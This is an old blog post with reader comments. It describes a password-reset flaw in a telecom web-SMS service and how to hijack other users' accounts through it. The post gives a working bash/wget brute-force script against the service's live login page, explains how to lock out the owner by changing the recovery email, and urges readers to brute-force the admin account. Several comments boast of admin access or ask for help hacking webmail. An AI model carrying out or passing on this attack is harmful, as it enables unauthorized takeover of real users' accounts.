Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups

Sunday, January 6, 2008

Unauthrized Access / Hijack NTC WebSMS Account

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
NTC WebSMS is a very popular service to send sms to any NTC's Namaste SIM Card holding user from their website. At most, one can send 10 SMS per day and this service is totally free, althought with a twist. The service is available to only NTC SIM card holder since to get an account, you need to fill in your SIM's pin number. Fine!!

When an sms is sent, the recipient receives a SMS from 2424 with the original number as the sender, as a header in SMS. This is how the recipient knows who sent the SMS.


Level of Vulnerability

7/10 since hijacking other's account is possible, but then you cannot do any other fun stuffs than to send SMS through this account.

The Flaw
I wonder what people think when they create a software. Do they think OMG, i got to finish this application ASAP, im drunk and its due tomorrow! Probably not, but then the password reset option in the website is seriously flawed!!

Steps involved in resetting password.
1) Go to login page, click forgot password
2) Put the cell phone number account, 9841123456(example), click Submit
3) You are given the message that the password has BEEN RESET and to see the email for further details.

Oh, now anyone can submit my cell phone number and hit submit, its instantly changed and oh the next time i try to login, i cannot, because the password has been changed by some pycho and i wasn't asked for any confirmation. LAME LAME!! I have to then manually open my related email address and then search for the email.

Disection of the new password
I got the email alright with my new password, it strikingly looks predictible, the format of the new password
if my username is 9841123456, my password is set to 9841123456XXX.0

Cough! Cough! the XXX is some randomly chosen number, could be 000 or 512 or any ther number between 000 to 999.


The Hack
You must have guessed it by now, but I still list the steps for everyone's convinience

To hack the websms account of 9841123456, follow following steps
Step
1) Go to login page, click on forgot password and type 9841123456, hit submit
2) Since the new password is gone to the original owner, we will now brute force WebSMS!
3) In my case, i created a shell script in bash, use wget to send post variables username and password that will randomly try passwords 9841123456000.0 to 9841123456999.0
4) The returned file is saved to 000.txt to 999.txt (Yes 1000 txt files)
5) I see the result, sort the files according to file size
6) The page saying username/password invalid is 3KB in size while page with successful login is around 16KB in size.
7) So if the file 512.txt is bigger than all the rest, the new password is 9841123456512.0
8) Login to websms using this password, go to Options and change settings, ie the primary email so that next time anyone tries to reset the password, i get the new SMS!


Script
Save the following lines of code as pwfinder.sh, give executable permission to it, change the value of b to any username
b=9841123456
a=000
while [ $a -lt 1000 ]
do
wget http://websms.ntc.net.np/websmss/login.jsp --post-data="username=$b&password=$b$a.0&flag=1" -O $a.txt
((a=a+1))
done


Pretty simple,
I did put an & at the last of wget so it ran in background, but then the number of connection at a time to ntc's web server were very high, and was giving weird results. Without the &, there is at most, one connection to NTC's websms werver, so results were as expected.

Find out which file is the biggest, use ur fav file browser, in my case
$ du . -a | sort -n and i can see the file at the bottom.

Cheers All
Happy cracking

PS. Do brute force the username admin, i saw some pretty nice links in it!!

14 comments:

Dont mess with me !!!!! said...

hey bro....

article daami cha....

i also knew the admin password by this process...

N it was a nice experience to see the NTC websms admin's page....

Dont mess with me !!!!! said...

keep rocking bro !!!!

N can't u help hacking
hotmail or yahoo....

If u do have some ideas,please post it..

AVi said...

"At most, one can send 10 SMS per day"..
..but i think we can send as many messages as we can these days..

Danepali Hacker said...

he man nice article
ani suna na hamro pani euta group cha hai
ani hamro group lai join garera hamilai help garana hai
www.gorkhahack.net.tc
www.nepalimadbulls.wetpaint.com

a said...

hey great article...
http://anup-views.blogspot.com
http://anupkayastha.blogspot.com

thanX...

yo said...

hey,
do i have to make 1000 txt files frm 000 to 1000 or i can make in a single copy of txt file including all the number frm 0 to 1000 nd where shall i paste these txt files
help! me

a said...

really nice blog!!

http://hacktutors.blogspot.com

Unknown said...

ask pin code /puk code in ntc web sms any body help me to solve this problem

jwala pandey said...
This comment has been removed by the author.
musicbid.co.cc said...

Liked the trick brother..Hack the world to use free...
Great.
Nepali Chords

Aakash said...

This trick is longer go to www.freesmscraze.com and send as many you can

Unknown said...

I think the things you covered through the post are quiet impressive, good job and great efforts. I found it very interesting and enjoyed reading all of it...keep it up, lovely job..
web design bangalore

Bangaloreweb guru said...

Nice post. In mean time we have to know about hacker tricks based on that safe strategies must do for a website.
Website Design Companies Bangalore | Web Design Company Bangalore

nolothism said...

sd929 kedscanada,supergahungary,guess çanta,cotopaxiireland,melissacanada,cotopaxi fleece,cotopaxiuk,filaperu,outdoorresearchnz ig020